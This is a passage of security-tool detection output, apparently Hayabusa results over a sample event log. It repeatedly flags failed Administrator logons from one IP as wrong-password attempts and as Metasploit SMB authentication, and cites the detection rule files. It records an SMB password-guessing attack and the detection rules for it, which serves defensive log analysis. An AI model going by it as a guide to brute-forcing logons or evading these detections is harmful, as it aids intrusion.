+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Unknown Reason,User: Administrator : Type: 3 : Workstation: ZrSGxwUyV6gCUPeb : IP Address: 192.168.198.149 : SubStatus: 0xc0000072 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-UnknownError.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.042 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUBgTr05x3djEYdM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.179 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 40PhGU4ZXu7uihop : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1DJ9r72hXZH9rEkb : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: khy2BeyBb9wq00f7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1cDckicL7IMrO7OQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.462 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEEkvfVd3FCap6fa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGFSyHQ0ZNWofxzE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.545 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ItOZqZSDTrdWpkbp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NhNdf5lHfrHKSCXq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.611 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: xg05F6tdf3kR9kdP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.646 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 70rRbaC6L6SzT15q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnJyN8wF21ff2L1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.735 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MUZHZJMQznj6GBqg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9h52ZKMbXLuFvUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n95RJvcQnFrAG2iX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.839 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xI23nmysFlr1pvVf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.883 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nVsjcTxDdZbzkmMx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.916 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mMuWatQuNBh9UKdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.955 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BfC3JZ3awqFDNQbm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:08.992 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 337h8PHN6Axi0iaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qGQpWOuzgETfxTgJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oFjlyMAJMI2zIC8w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7exAVz3PlzJQ6Wcw : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.144 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RuYihjQpt76foAW3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.183 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlPm2vRh9EHN9J6n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n9jDy3NDDPe7XgyW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AtGxqEKOoP6W3w0Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.291 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BLqYztXwV80UBez1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0yki1dEFZrnMLs2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: jbE2z1W1wQgoTDso : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJmZFXFxiLuWWkMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.455 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: x9EPwprgXSJNUFfg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h0ZjYxZ8K5m5F1vo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xSw7OjDv8ldqbm5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.587 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mk0BAdOI210HwPhX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSwWz57Kvl2XJVUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.686 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DLcfSrHT5bSsNnuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQDkbESps0PXWEUT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.760 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpnyzkXasuyAtdn1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.797 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ps9IqJzTliJvzpIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.840 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V7PLb2uRTIY8t123 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.876 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sHAJ9p0QbSRxhvtk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.921 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YRiE1wGrwWAx0feP : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:09.968 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Flo4bCVjmlaHz0QS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HscUujSzd3Ua7dqg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.061 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aIQPTx67aEer51wb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:10.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
